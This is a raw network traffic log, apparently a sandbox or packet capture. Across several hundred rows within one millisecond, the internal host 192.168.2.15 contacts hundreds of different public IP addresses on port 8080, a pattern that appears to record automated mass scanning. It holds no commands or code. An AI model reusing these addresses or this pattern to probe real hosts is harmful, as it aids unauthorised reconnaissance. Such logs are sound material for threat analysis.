Feb 25, 2024 19:02:19.571593046 CET	6758	8080	192.168.2.15	94.207.64.87
Feb 25, 2024 19:02:19.571593046 CET	6758	8080	192.168.2.15	94.164.239.56
Feb 25, 2024 19:02:19.571593046 CET	6758	8080	192.168.2.15	31.202.50.59
Feb 25, 2024 19:02:19.571599960 CET	6758	8080	192.168.2.15	62.208.124.69
Feb 25, 2024 19:02:19.571600914 CET	6758	8080	192.168.2.15	94.161.251.142
Feb 25, 2024 19:02:19.571600914 CET	6758	8080	192.168.2.15	95.211.167.251
Feb 25, 2024 19:02:19.571600914 CET	6758	8080	192.168.2.15	62.155.147.253
Feb 25, 2024 19:02:19.571600914 CET	6758	8080	192.168.2.15	94.69.90.123
Feb 25, 2024 19:02:19.571600914 CET	6758	8080	192.168.2.15	95.67.216.140
Feb 25, 2024 19:02:19.571600914 CET	6758	8080	192.168.2.15	94.37.134.186
Feb 25, 2024 19:02:19.571619034 CET	6758	8080	192.168.2.15	62.49.223.20
Feb 25, 2024 19:02:19.571619034 CET	6758	8080	192.168.2.15	95.156.80.20
Feb 25, 2024 19:02:19.571619034 CET	6758	8080	192.168.2.15	94.238.69.161
Feb 25, 2024 19:02:19.571619034 CET	6758	8080	192.168.2.15	94.206.179.56
Feb 25, 2024 19:02:19.571619034 CET	6758	8080	192.168.2.15	85.242.102.246
Feb 25, 2024 19:02:19.571619034 CET	6758	8080	192.168.2.15	31.58.163.192
Feb 25, 2024 19:02:19.571619034 CET	6758	8080	192.168.2.15	31.118.222.165
Feb 25, 2024 19:02:19.571619034 CET	6758	8080	192.168.2.15	31.86.241.154
Feb 25, 2024 19:02:19.571619034 CET	6758	8080	192.168.2.15	62.59.16.97
Feb 25, 2024 19:02:19.571619034 CET	6758	8080	192.168.2.15	62.196.85.230
Feb 25, 2024 19:02:19.571619034 CET	6758	8080	192.168.2.15	95.28.127.106
Feb 25, 2024 19:02:19.571643114 CET	6758	8080	192.168.2.15	94.38.111.25
Feb 25, 2024 19:02:19.571643114 CET	6758	8080	192.168.2.15	62.190.208.30
Feb 25, 2024 19:02:19.571643114 CET	6758	8080	192.168.2.15	31.86.162.225
Feb 25, 2024 19:02:19.571643114 CET	6758	8080	192.168.2.15	85.107.187.90
Feb 25, 2024 19:02:19.571643114 CET	6758	8080	192.168.2.15	62.249.180.18
Feb 25, 2024 19:02:19.571669102 CET	6758	8080	192.168.2.15	62.207.130.235
Feb 25, 2024 19:02:19.571669102 CET	6758	8080	192.168.2.15	62.28.145.97
Feb 25, 2024 19:02:19.571669102 CET	6758	8080	192.168.2.15	62.15.30.96
Feb 25, 2024 19:02:19.571669102 CET	6758	8080	192.168.2.15	62.154.166.150
Feb 25, 2024 19:02:19.571669102 CET	6758	8080	192.168.2.15	94.95.242.230
Feb 25, 2024 19:02:19.571674109 CET	6758	8080	192.168.2.15	94.166.173.168
Feb 25, 2024 19:02:19.571674109 CET	6758	8080	192.168.2.15	62.67.192.242
Feb 25, 2024 19:02:19.571674109 CET	6758	8080	192.168.2.15	62.29.253.240
Feb 25, 2024 19:02:19.571674109 CET	6758	8080	192.168.2.15	31.75.187.106
Feb 25, 2024 19:02:19.571674109 CET	6758	8080	192.168.2.15	85.1.128.29
Feb 25, 2024 19:02:19.571677923 CET	6758	8080	192.168.2.15	62.73.177.109
Feb 25, 2024 19:02:19.571677923 CET	6758	8080	192.168.2.15	31.50.94.94
Feb 25, 2024 19:02:19.571677923 CET	6758	8080	192.168.2.15	85.221.164.34
Feb 25, 2024 19:02:19.571677923 CET	6758	8080	192.168.2.15	94.159.46.124
Feb 25, 2024 19:02:19.571677923 CET	6758	8080	192.168.2.15	94.163.162.225
Feb 25, 2024 19:02:19.571677923 CET	6758	8080	192.168.2.15	62.92.127.20
Feb 25, 2024 19:02:19.571677923 CET	6758	8080	192.168.2.15	85.76.49.174
Feb 25, 2024 19:02:19.571677923 CET	6758	8080	192.168.2.15	62.30.127.255
Feb 25, 2024 19:02:19.571683884 CET	6758	8080	192.168.2.15	62.29.36.4
Feb 25, 2024 19:02:19.571683884 CET	6758	8080	192.168.2.15	62.232.21.54
Feb 25, 2024 19:02:19.571683884 CET	6758	8080	192.168.2.15	62.136.137.131
Feb 25, 2024 19:02:19.571683884 CET	6758	8080	192.168.2.15	62.177.99.54
Feb 25, 2024 19:02:19.571683884 CET	6758	8080	192.168.2.15	31.131.90.36
Feb 25, 2024 19:02:19.571683884 CET	6758	8080	192.168.2.15	85.14.147.113
Feb 25, 2024 19:02:19.571683884 CET	6758	8080	192.168.2.15	94.39.11.203
Feb 25, 2024 19:02:19.571738958 CET	6758	8080	192.168.2.15	62.151.32.250
Feb 25, 2024 19:02:19.571738958 CET	6758	8080	192.168.2.15	94.126.244.70
Feb 25, 2024 19:02:19.571738958 CET	6758	8080	192.168.2.15	85.169.252.90
Feb 25, 2024 19:02:19.571738958 CET	6758	8080	192.168.2.15	85.229.39.230
Feb 25, 2024 19:02:19.571738958 CET	6758	8080	192.168.2.15	62.116.107.251
Feb 25, 2024 19:02:19.571738958 CET	6758	8080	192.168.2.15	85.116.190.144
Feb 25, 2024 19:02:19.571738958 CET	6758	8080	192.168.2.15	95.202.83.224
Feb 25, 2024 19:02:19.571738958 CET	6758	8080	192.168.2.15	62.54.49.194
Feb 25, 2024 19:02:19.571743965 CET	6758	8080	192.168.2.15	31.34.114.4
Feb 25, 2024 19:02:19.571743965 CET	6758	8080	192.168.2.15	85.89.14.109
Feb 25, 2024 19:02:19.571743965 CET	6758	8080	192.168.2.15	62.138.125.201
Feb 25, 2024 19:02:19.571744919 CET	6758	8080	192.168.2.15	31.13.119.123
Feb 25, 2024 19:02:19.571744919 CET	6758	8080	192.168.2.15	62.191.89.147
Feb 25, 2024 19:02:19.571744919 CET	6758	8080	192.168.2.15	62.209.23.156
Feb 25, 2024 19:02:19.571748972 CET	6758	8080	192.168.2.15	95.83.131.106
Feb 25, 2024 19:02:19.571744919 CET	6758	8080	192.168.2.15	85.62.204.29
Feb 25, 2024 19:02:19.571748972 CET	6758	8080	192.168.2.15	94.240.46.10
Feb 25, 2024 19:02:19.571748972 CET	6758	8080	192.168.2.15	95.17.104.93
Feb 25, 2024 19:02:19.571748972 CET	6758	8080	192.168.2.15	95.91.74.66
Feb 25, 2024 19:02:19.571748972 CET	6758	8080	192.168.2.15	31.179.49.98
Feb 25, 2024 19:02:19.571748972 CET	6758	8080	192.168.2.15	85.20.53.22
Feb 25, 2024 19:02:19.571772099 CET	6758	8080	192.168.2.15	95.195.154.91
Feb 25, 2024 19:02:19.571772099 CET	6758	8080	192.168.2.15	94.210.179.251
Feb 25, 2024 19:02:19.571772099 CET	6758	8080	192.168.2.15	94.179.236.244
Feb 25, 2024 19:02:19.571772099 CET	6758	8080	192.168.2.15	62.125.42.152
Feb 25, 2024 19:02:19.571772099 CET	6758	8080	192.168.2.15	31.105.158.24
Feb 25, 2024 19:02:19.571773052 CET	6758	8080	192.168.2.15	95.114.110.212
Feb 25, 2024 19:02:19.571773052 CET	6758	8080	192.168.2.15	62.75.82.69
Feb 25, 2024 19:02:19.571773052 CET	6758	8080	192.168.2.15	62.119.86.158
Feb 25, 2024 19:02:19.571773052 CET	6758	8080	192.168.2.15	95.243.50.84
Feb 25, 2024 19:02:19.571773052 CET	6758	8080	192.168.2.15	85.171.61.184
Feb 25, 2024 19:02:19.571773052 CET	6758	8080	192.168.2.15	85.0.226.153
Feb 25, 2024 19:02:19.571785927 CET	6758	8080	192.168.2.15	62.34.117.17
Feb 25, 2024 19:02:19.571785927 CET	6758	8080	192.168.2.15	95.184.70.148
Feb 25, 2024 19:02:19.571785927 CET	6758	8080	192.168.2.15	85.49.255.16
Feb 25, 2024 19:02:19.571785927 CET	6758	8080	192.168.2.15	94.189.228.132
Feb 25, 2024 19:02:19.571785927 CET	6758	8080	192.168.2.15	62.215.88.191
Feb 25, 2024 19:02:19.571785927 CET	6758	8080	192.168.2.15	94.102.66.122
Feb 25, 2024 19:02:19.571785927 CET	6758	8080	192.168.2.15	62.83.59.151
Feb 25, 2024 19:02:19.571785927 CET	6758	8080	192.168.2.15	95.163.239.101
Feb 25, 2024 19:02:19.571788073 CET	6758	8080	192.168.2.15	62.93.155.168
Feb 25, 2024 19:02:19.571788073 CET	6758	8080	192.168.2.15	95.84.116.160
Feb 25, 2024 19:02:19.571788073 CET	6758	8080	192.168.2.15	31.39.135.164
Feb 25, 2024 19:02:19.571788073 CET	6758	8080	192.168.2.15	62.141.45.212
Feb 25, 2024 19:02:19.571788073 CET	6758	8080	192.168.2.15	31.72.49.14
Feb 25, 2024 19:02:19.571788073 CET	6758	8080	192.168.2.15	85.218.61.55
Feb 25, 2024 19:02:19.571788073 CET	6758	8080	192.168.2.15	95.109.150.140
Feb 25, 2024 19:02:19.571788073 CET	6758	8080	192.168.2.15	85.71.161.39
Feb 25, 2024 19:02:19.571788073 CET	6758	8080	192.168.2.15	31.51.22.18
Feb 25, 2024 19:02:19.571788073 CET	6758	8080	192.168.2.15	94.202.116.175
Feb 25, 2024 19:02:19.571788073 CET	6758	8080	192.168.2.15	31.99.108.60
Feb 25, 2024 19:02:19.571788073 CET	6758	8080	192.168.2.15	85.165.19.113
Feb 25, 2024 19:02:19.571788073 CET	6758	8080	192.168.2.15	85.182.204.187
Feb 25, 2024 19:02:19.571827888 CET	6758	8080	192.168.2.15	95.156.86.128
Feb 25, 2024 19:02:19.571827888 CET	6758	8080	192.168.2.15	95.220.24.227
Feb 25, 2024 19:02:19.571827888 CET	6758	8080	192.168.2.15	31.207.196.68
Feb 25, 2024 19:02:19.571827888 CET	6758	8080	192.168.2.15	62.52.73.237
Feb 25, 2024 19:02:19.571827888 CET	6758	8080	192.168.2.15	62.150.211.138
Feb 25, 2024 19:02:19.571827888 CET	6758	8080	192.168.2.15	95.111.78.196
Feb 25, 2024 19:02:19.571827888 CET	6758	8080	192.168.2.15	85.207.193.247
Feb 25, 2024 19:02:19.571861029 CET	6758	8080	192.168.2.15	95.80.123.225
Feb 25, 2024 19:02:19.571861029 CET	6758	8080	192.168.2.15	95.115.254.48
Feb 25, 2024 19:02:19.571861029 CET	6758	8080	192.168.2.15	94.64.74.123
Feb 25, 2024 19:02:19.571861029 CET	6758	8080	192.168.2.15	62.193.200.241
Feb 25, 2024 19:02:19.571861029 CET	6758	8080	192.168.2.15	94.253.28.37
Feb 25, 2024 19:02:19.571861029 CET	6758	8080	192.168.2.15	95.197.240.175
Feb 25, 2024 19:02:19.571861029 CET	6758	8080	192.168.2.15	94.25.2.93
Feb 25, 2024 19:02:19.571878910 CET	6758	8080	192.168.2.15	95.127.112.19
Feb 25, 2024 19:02:19.571878910 CET	6758	8080	192.168.2.15	85.169.194.196
Feb 25, 2024 19:02:19.571878910 CET	6758	8080	192.168.2.15	94.247.84.144
Feb 25, 2024 19:02:19.571878910 CET	6758	8080	192.168.2.15	85.118.233.209
Feb 25, 2024 19:02:19.571878910 CET	6758	8080	192.168.2.15	31.79.134.173
Feb 25, 2024 19:02:19.571880102 CET	6758	8080	192.168.2.15	31.45.88.46
Feb 25, 2024 19:02:19.571878910 CET	6758	8080	192.168.2.15	94.221.175.61
Feb 25, 2024 19:02:19.571880102 CET	6758	8080	192.168.2.15	31.208.160.213
Feb 25, 2024 19:02:19.571878910 CET	6758	8080	192.168.2.15	95.71.55.51
Feb 25, 2024 19:02:19.571880102 CET	6758	8080	192.168.2.15	62.35.221.221
Feb 25, 2024 19:02:19.571880102 CET	6758	8080	192.168.2.15	62.103.248.99
Feb 25, 2024 19:02:19.571880102 CET	6758	8080	192.168.2.15	62.96.44.137
Feb 25, 2024 19:02:19.571880102 CET	6758	8080	192.168.2.15	31.103.197.57
Feb 25, 2024 19:02:19.571899891 CET	6758	8080	192.168.2.15	94.136.8.51
Feb 25, 2024 19:02:19.571899891 CET	6758	8080	192.168.2.15	94.127.57.159
Feb 25, 2024 19:02:19.571899891 CET	6758	8080	192.168.2.15	85.111.150.151
Feb 25, 2024 19:02:19.571899891 CET	6758	8080	192.168.2.15	85.72.120.247
Feb 25, 2024 19:02:19.571899891 CET	6758	8080	192.168.2.15	31.82.41.211
Feb 25, 2024 19:02:19.571899891 CET	6758	8080	192.168.2.15	31.198.221.172
Feb 25, 2024 19:02:19.571899891 CET	6758	8080	192.168.2.15	31.21.115.194
Feb 25, 2024 19:02:19.571899891 CET	6758	8080	192.168.2.15	85.18.120.79
Feb 25, 2024 19:02:19.571899891 CET	6758	8080	192.168.2.15	31.22.48.172
Feb 25, 2024 19:02:19.571899891 CET	6758	8080	192.168.2.15	85.84.98.152
Feb 25, 2024 19:02:19.571899891 CET	6758	8080	192.168.2.15	62.184.129.216
Feb 25, 2024 19:02:19.571899891 CET	6758	8080	192.168.2.15	85.144.139.133
Feb 25, 2024 19:02:19.571899891 CET	6758	8080	192.168.2.15	31.106.148.65
Feb 25, 2024 19:02:19.571906090 CET	6758	8080	192.168.2.15	85.170.160.44
Feb 25, 2024 19:02:19.571906090 CET	6758	8080	192.168.2.15	95.122.116.204
Feb 25, 2024 19:02:19.571906090 CET	6758	8080	192.168.2.15	62.163.14.23
Feb 25, 2024 19:02:19.571906090 CET	6758	8080	192.168.2.15	85.52.103.0
Feb 25, 2024 19:02:19.571906090 CET	6758	8080	192.168.2.15	62.141.43.151
Feb 25, 2024 19:02:19.571906090 CET	6758	8080	192.168.2.15	62.68.122.130
Feb 25, 2024 19:02:19.571914911 CET	6758	8080	192.168.2.15	95.16.56.15
Feb 25, 2024 19:02:19.571914911 CET	6758	8080	192.168.2.15	31.53.241.112
Feb 25, 2024 19:02:19.571914911 CET	6758	8080	192.168.2.15	62.145.84.8
Feb 25, 2024 19:02:19.571914911 CET	6758	8080	192.168.2.15	94.166.91.144
Feb 25, 2024 19:02:19.571914911 CET	6758	8080	192.168.2.15	85.99.60.193
Feb 25, 2024 19:02:19.571914911 CET	6758	8080	192.168.2.15	95.10.28.90
Feb 25, 2024 19:02:19.571919918 CET	6758	8080	192.168.2.15	95.33.251.213
Feb 25, 2024 19:02:19.571919918 CET	6758	8080	192.168.2.15	85.198.56.38
Feb 25, 2024 19:02:19.571919918 CET	6758	8080	192.168.2.15	95.167.53.79
Feb 25, 2024 19:02:19.571919918 CET	6758	8080	192.168.2.15	85.151.147.226
Feb 25, 2024 19:02:19.571919918 CET	6758	8080	192.168.2.15	62.49.181.163
Feb 25, 2024 19:02:19.571919918 CET	6758	8080	192.168.2.15	85.164.106.66
Feb 25, 2024 19:02:19.571919918 CET	6758	8080	192.168.2.15	95.112.30.31
Feb 25, 2024 19:02:19.571919918 CET	6758	8080	192.168.2.15	94.128.182.245
Feb 25, 2024 19:02:19.571945906 CET	6758	8080	192.168.2.15	62.95.160.142
Feb 25, 2024 19:02:19.571945906 CET	6758	8080	192.168.2.15	94.34.186.100
Feb 25, 2024 19:02:19.571945906 CET	6758	8080	192.168.2.15	94.151.184.163
Feb 25, 2024 19:02:19.571945906 CET	6758	8080	192.168.2.15	62.52.117.159
Feb 25, 2024 19:02:19.571945906 CET	6758	8080	192.168.2.15	95.48.111.213
Feb 25, 2024 19:02:19.571945906 CET	6758	8080	192.168.2.15	31.228.185.97
Feb 25, 2024 19:02:19.571945906 CET	6758	8080	192.168.2.15	94.157.93.253
Feb 25, 2024 19:02:19.571989059 CET	6758	8080	192.168.2.15	85.77.92.189
Feb 25, 2024 19:02:19.571989059 CET	6758	8080	192.168.2.15	94.84.94.57
Feb 25, 2024 19:02:19.571989059 CET	6758	8080	192.168.2.15	31.89.64.191
Feb 25, 2024 19:02:19.571989059 CET	6758	8080	192.168.2.15	62.93.33.70
Feb 25, 2024 19:02:19.571989059 CET	6758	8080	192.168.2.15	31.130.164.59
Feb 25, 2024 19:02:19.571989059 CET	6758	8080	192.168.2.15	95.179.79.228
Feb 25, 2024 19:02:19.571989059 CET	6758	8080	192.168.2.15	85.125.120.45
Feb 25, 2024 19:02:19.572005033 CET	6758	8080	192.168.2.15	85.157.198.27
Feb 25, 2024 19:02:19.572005033 CET	6758	8080	192.168.2.15	85.114.159.35
Feb 25, 2024 19:02:19.572005033 CET	6758	8080	192.168.2.15	62.132.73.229
Feb 25, 2024 19:02:19.572005033 CET	6758	8080	192.168.2.15	94.144.47.54
Feb 25, 2024 19:02:19.572005033 CET	6758	8080	192.168.2.15	95.233.112.107
Feb 25, 2024 19:02:19.572005033 CET	6758	8080	192.168.2.15	85.52.64.123
Feb 25, 2024 19:02:19.572005033 CET	6758	8080	192.168.2.15	94.8.74.104
Feb 25, 2024 19:02:19.572016954 CET	6758	8080	192.168.2.15	95.12.17.150
Feb 25, 2024 19:02:19.572016954 CET	6758	8080	192.168.2.15	62.48.56.42
Feb 25, 2024 19:02:19.572016954 CET	6758	8080	192.168.2.15	94.169.162.20
Feb 25, 2024 19:02:19.572016954 CET	6758	8080	192.168.2.15	94.104.209.245
Feb 25, 2024 19:02:19.572016954 CET	6758	8080	192.168.2.15	31.181.7.203
Feb 25, 2024 19:02:19.572016954 CET	6758	8080	192.168.2.15	31.223.144.109
Feb 25, 2024 19:02:19.572024107 CET	6758	8080	192.168.2.15	62.105.156.101
Feb 25, 2024 19:02:19.572024107 CET	6758	8080	192.168.2.15	62.185.177.115
Feb 25, 2024 19:02:19.572024107 CET	6758	8080	192.168.2.15	95.249.0.10
Feb 25, 2024 19:02:19.572024107 CET	6758	8080	192.168.2.15	94.172.129.18
Feb 25, 2024 19:02:19.572024107 CET	6758	8080	192.168.2.15	31.221.107.107
Feb 25, 2024 19:02:19.572024107 CET	6758	8080	192.168.2.15	31.185.188.126
Feb 25, 2024 19:02:19.572024107 CET	6758	8080	192.168.2.15	85.72.228.27
Feb 25, 2024 19:02:19.572024107 CET	6758	8080	192.168.2.15	31.72.66.7
Feb 25, 2024 19:02:19.572033882 CET	6758	8080	192.168.2.15	85.78.239.182
Feb 25, 2024 19:02:19.572033882 CET	6758	8080	192.168.2.15	94.29.71.12
Feb 25, 2024 19:02:19.572033882 CET	6758	8080	192.168.2.15	31.58.208.85
Feb 25, 2024 19:02:19.572033882 CET	6758	8080	192.168.2.15	95.207.87.142
Feb 25, 2024 19:02:19.572033882 CET	6758	8080	192.168.2.15	95.28.106.141
Feb 25, 2024 19:02:19.572033882 CET	6758	8080	192.168.2.15	85.136.228.170
Feb 25, 2024 19:02:19.572033882 CET	6758	8080	192.168.2.15	94.1.113.46
Feb 25, 2024 19:02:19.572041035 CET	6758	8080	192.168.2.15	85.13.125.90
Feb 25, 2024 19:02:19.572041035 CET	6758	8080	192.168.2.15	62.218.159.130
Feb 25, 2024 19:02:19.572041035 CET	6758	8080	192.168.2.15	31.96.59.76
Feb 25, 2024 19:02:19.572041035 CET	6758	8080	192.168.2.15	31.131.84.60
Feb 25, 2024 19:02:19.572041035 CET	6758	8080	192.168.2.15	95.147.107.218
Feb 25, 2024 19:02:19.572041035 CET	6758	8080	192.168.2.15	31.42.149.183
Feb 25, 2024 19:02:19.572041035 CET	6758	8080	192.168.2.15	62.95.135.77
Feb 25, 2024 19:02:19.572041035 CET	6758	8080	192.168.2.15	62.225.226.70
Feb 25, 2024 19:02:19.572045088 CET	6758	8080	192.168.2.15	85.112.135.1
Feb 25, 2024 19:02:19.572045088 CET	6758	8080	192.168.2.15	94.46.49.11
Feb 25, 2024 19:02:19.572045088 CET	6758	8080	192.168.2.15	85.83.66.148
Feb 25, 2024 19:02:19.572045088 CET	6758	8080	192.168.2.15	62.147.246.90
Feb 25, 2024 19:02:19.572046041 CET	6758	8080	192.168.2.15	85.240.44.205
Feb 25, 2024 19:02:19.572046041 CET	6758	8080	192.168.2.15	31.95.46.60
Feb 25, 2024 19:02:19.572081089 CET	6758	8080	192.168.2.15	62.86.181.31
Feb 25, 2024 19:02:19.572081089 CET	6758	8080	192.168.2.15	62.49.52.121
Feb 25, 2024 19:02:19.572081089 CET	6758	8080	192.168.2.15	94.51.82.30
Feb 25, 2024 19:02:19.572081089 CET	6758	8080	192.168.2.15	31.42.86.123
Feb 25, 2024 19:02:19.572081089 CET	6758	8080	192.168.2.15	95.13.174.83
Feb 25, 2024 19:02:19.572081089 CET	6758	8080	192.168.2.15	31.87.236.40
Feb 25, 2024 19:02:19.572087049 CET	6758	8080	192.168.2.15	85.8.31.127
Feb 25, 2024 19:02:19.572087049 CET	6758	8080	192.168.2.15	31.84.230.110
Feb 25, 2024 19:02:19.572087049 CET	6758	8080	192.168.2.15	94.90.205.208
Feb 25, 2024 19:02:19.572087049 CET	6758	8080	192.168.2.15	62.159.194.73
Feb 25, 2024 19:02:19.572087049 CET	6758	8080	192.168.2.15	95.34.246.243
Feb 25, 2024 19:02:19.572087049 CET	6758	8080	192.168.2.15	31.70.100.162
Feb 25, 2024 19:02:19.572087049 CET	6758	8080	192.168.2.15	94.213.193.157
Feb 25, 2024 19:02:19.572108030 CET	6758	8080	192.168.2.15	62.112.80.145
Feb 25, 2024 19:02:19.572108030 CET	6758	8080	192.168.2.15	94.35.20.16
Feb 25, 2024 19:02:19.572108030 CET	6758	8080	192.168.2.15	94.232.106.9
Feb 25, 2024 19:02:19.572108030 CET	6758	8080	192.168.2.15	62.196.125.224
Feb 25, 2024 19:02:19.572108030 CET	6758	8080	192.168.2.15	94.226.106.111
Feb 25, 2024 19:02:19.572108030 CET	6758	8080	192.168.2.15	31.218.95.19
Feb 25, 2024 19:02:19.572123051 CET	6758	8080	192.168.2.15	62.104.149.227
Feb 25, 2024 19:02:19.572123051 CET	6758	8080	192.168.2.15	94.250.74.252
Feb 25, 2024 19:02:19.572123051 CET	6758	8080	192.168.2.15	94.212.71.136
Feb 25, 2024 19:02:19.572123051 CET	6758	8080	192.168.2.15	62.159.102.108
Feb 25, 2024 19:02:19.572160959 CET	6758	8080	192.168.2.15	85.8.100.78
Feb 25, 2024 19:02:19.572160959 CET	6758	8080	192.168.2.15	94.50.149.135
Feb 25, 2024 19:02:19.572160959 CET	6758	8080	192.168.2.15	94.248.46.184
Feb 25, 2024 19:02:19.572160959 CET	6758	8080	192.168.2.15	62.181.7.202
Feb 25, 2024 19:02:19.572160959 CET	6758	8080	192.168.2.15	95.10.61.117
Feb 25, 2024 19:02:19.572160959 CET	6758	8080	192.168.2.15	85.208.199.187
Feb 25, 2024 19:02:19.572160959 CET	6758	8080	192.168.2.15	95.214.231.98
Feb 25, 2024 19:02:19.572169065 CET	6758	8080	192.168.2.15	62.40.49.72
Feb 25, 2024 19:02:19.572169065 CET	6758	8080	192.168.2.15	95.190.150.191
Feb 25, 2024 19:02:19.572169065 CET	6758	8080	192.168.2.15	31.57.196.227
Feb 25, 2024 19:02:19.572169065 CET	6758	8080	192.168.2.15	62.97.243.116
Feb 25, 2024 19:02:19.572169065 CET	6758	8080	192.168.2.15	31.219.230.211
Feb 25, 2024 19:02:19.572169065 CET	6758	8080	192.168.2.15	85.123.75.203
Feb 25, 2024 19:02:19.572196960 CET	6758	8080	192.168.2.15	85.144.212.233
Feb 25, 2024 19:02:19.572196960 CET	6758	8080	192.168.2.15	94.74.122.0
Feb 25, 2024 19:02:19.572196960 CET	6758	8080	192.168.2.15	85.44.68.50
Feb 25, 2024 19:02:19.572196960 CET	6758	8080	192.168.2.15	94.251.32.186
Feb 25, 2024 19:02:19.572196960 CET	6758	8080	192.168.2.15	62.43.15.7
Feb 25, 2024 19:02:19.572196960 CET	6758	8080	192.168.2.15	94.154.91.196
Feb 25, 2024 19:02:19.572196960 CET	6758	8080	192.168.2.15	62.156.3.178
Feb 25, 2024 19:02:19.572199106 CET	6758	8080	192.168.2.15	85.10.117.135
Feb 25, 2024 19:02:19.572199106 CET	6758	8080	192.168.2.15	62.143.151.47
Feb 25, 2024 19:02:19.572199106 CET	6758	8080	192.168.2.15	95.101.211.80
Feb 25, 2024 19:02:19.572199106 CET	6758	8080	192.168.2.15	62.235.212.151
Feb 25, 2024 19:02:19.572199106 CET	6758	8080	192.168.2.15	31.128.24.193
Feb 25, 2024 19:02:19.572199106 CET	6758	8080	192.168.2.15	31.160.218.231
Feb 25, 2024 19:02:19.572204113 CET	6758	8080	192.168.2.15	62.203.136.233
Feb 25, 2024 19:02:19.572204113 CET	6758	8080	192.168.2.15	94.118.53.112
Feb 25, 2024 19:02:19.572204113 CET	6758	8080	192.168.2.15	31.188.62.133
Feb 25, 2024 19:02:19.572231054 CET	6758	8080	192.168.2.15	31.79.111.207
Feb 25, 2024 19:02:19.572231054 CET	6758	8080	192.168.2.15	62.224.34.138
Feb 25, 2024 19:02:19.572232008 CET	6758	8080	192.168.2.15	31.249.34.17
Feb 25, 2024 19:02:19.572232008 CET	6758	8080	192.168.2.15	31.82.149.105
Feb 25, 2024 19:02:19.572232008 CET	6758	8080	192.168.2.15	31.131.131.13
Feb 25, 2024 19:02:19.572232008 CET	6758	8080	192.168.2.15	62.105.207.139
Feb 25, 2024 19:02:19.572232008 CET	6758	8080	192.168.2.15	95.205.201.162
Feb 25, 2024 19:02:19.572237015 CET	6758	8080	192.168.2.15	31.48.253.147
Feb 25, 2024 19:02:19.572237968 CET	6758	8080	192.168.2.15	62.11.30.99
Feb 25, 2024 19:02:19.572237015 CET	6758	8080	192.168.2.15	95.229.246.64
Feb 25, 2024 19:02:19.572237015 CET	6758	8080	192.168.2.15	95.233.95.49
Feb 25, 2024 19:02:19.572237015 CET	6758	8080	192.168.2.15	85.253.197.158
Feb 25, 2024 19:02:19.572237015 CET	6758	8080	192.168.2.15	94.112.8.24
Feb 25, 2024 19:02:19.572237015 CET	6758	8080	192.168.2.15	85.136.29.58
Feb 25, 2024 19:02:19.572237015 CET	6758	8080	192.168.2.15	31.229.189.135
Feb 25, 2024 19:02:19.572246075 CET	6758	8080	192.168.2.15	85.122.188.45
Feb 25, 2024 19:02:19.572246075 CET	6758	8080	192.168.2.15	94.98.242.226
Feb 25, 2024 19:02:19.572246075 CET	6758	8080	192.168.2.15	94.63.136.230
Feb 25, 2024 19:02:19.572246075 CET	6758	8080	192.168.2.15	62.231.73.55
Feb 25, 2024 19:02:19.572246075 CET	6758	8080	192.168.2.15	31.126.172.232
Feb 25, 2024 19:02:19.572246075 CET	6758	8080	192.168.2.15	31.113.114.85
Feb 25, 2024 19:02:19.572246075 CET	6758	8080	192.168.2.15	62.25.147.212
Feb 25, 2024 19:02:19.572246075 CET	6758	8080	192.168.2.15	94.81.252.34
Feb 25, 2024 19:02:19.572252035 CET	6758	8080	192.168.2.15	94.117.161.255
Feb 25, 2024 19:02:19.572252035 CET	6758	8080	192.168.2.15	85.107.57.57
Feb 25, 2024 19:02:19.572252035 CET	6758	8080	192.168.2.15	62.23.200.246
Feb 25, 2024 19:02:19.572252035 CET	6758	8080	192.168.2.15	94.90.99.219
Feb 25, 2024 19:02:19.572252035 CET	6758	8080	192.168.2.15	95.230.11.182
Feb 25, 2024 19:02:19.572252035 CET	6758	8080	192.168.2.15	62.49.8.150
Feb 25, 2024 19:02:19.572276115 CET	6758	8080	192.168.2.15	85.213.122.130
Feb 25, 2024 19:02:19.572287083 CET	6758	8080	192.168.2.15	94.65.95.134
Feb 25, 2024 19:02:19.572287083 CET	6758	8080	192.168.2.15	31.4.242.149
Feb 25, 2024 19:02:19.572287083 CET	6758	8080	192.168.2.15	62.178.165.248
Feb 25, 2024 19:02:19.572287083 CET	6758	8080	192.168.2.15	62.214.210.193
Feb 25, 2024 19:02:19.572287083 CET	6758	8080	192.168.2.15	31.210.151.160
Feb 25, 2024 19:02:19.572288036 CET	6758	8080	192.168.2.15	62.247.76.103
Feb 25, 2024 19:02:19.572287083 CET	6758	8080	192.168.2.15	94.143.251.112
Feb 25, 2024 19:02:19.572288036 CET	6758	8080	192.168.2.15	95.184.223.201
Feb 25, 2024 19:02:19.572287083 CET	6758	8080	192.168.2.15	94.164.176.184
Feb 25, 2024 19:02:19.572288036 CET	6758	8080	192.168.2.15	62.59.203.158
Feb 25, 2024 19:02:19.572287083 CET	6758	8080	192.168.2.15	94.201.207.61
Feb 25, 2024 19:02:19.572288036 CET	6758	8080	192.168.2.15	94.66.71.135
Feb 25, 2024 19:02:19.572293997 CET	6758	8080	192.168.2.15	85.99.186.179
Feb 25, 2024 19:02:19.572288036 CET	6758	8080	192.168.2.15	94.40.97.222
Feb 25, 2024 19:02:19.572288036 CET	6758	8080	192.168.2.15	95.29.38.214
Feb 25, 2024 19:02:19.572288036 CET	6758	8080	192.168.2.15	95.170.30.51
Feb 25, 2024 19:02:19.572299957 CET	6758	8080	192.168.2.15	94.159.10.223
Feb 25, 2024 19:02:19.572299957 CET	6758	8080	192.168.2.15	95.49.27.66
Feb 25, 2024 19:02:19.572299957 CET	6758	8080	192.168.2.15	95.151.222.6
Feb 25, 2024 19:02:19.572299957 CET	6758	8080	192.168.2.15	62.65.35.192
Feb 25, 2024 19:02:19.572299957 CET	6758	8080	192.168.2.15	94.64.75.71
Feb 25, 2024 19:02:19.572299957 CET	6758	8080	192.168.2.15	31.6.136.68
Feb 25, 2024 19:02:19.572300911 CET	6758	8080	192.168.2.15	95.170.125.147
Feb 25, 2024 19:02:19.572300911 CET	6758	8080	192.168.2.15	85.234.77.224
Feb 25, 2024 19:02:19.572314024 CET	6758	8080	192.168.2.15	31.126.14.1
Feb 25, 2024 19:02:19.572324991 CET	6758	8080	192.168.2.15	85.71.64.87
Feb 25, 2024 19:02:19.572333097 CET	6758	8080	192.168.2.15	85.116.177.132
Feb 25, 2024 19:02:19.572333097 CET	6758	8080	192.168.2.15	31.182.154.94
Feb 25, 2024 19:02:19.572339058 CET	6758	8080	192.168.2.15	62.47.30.32
Feb 25, 2024 19:02:19.572339058 CET	6758	8080	192.168.2.15	94.112.178.208
Feb 25, 2024 19:02:19.572333097 CET	6758	8080	192.168.2.15	94.159.26.49
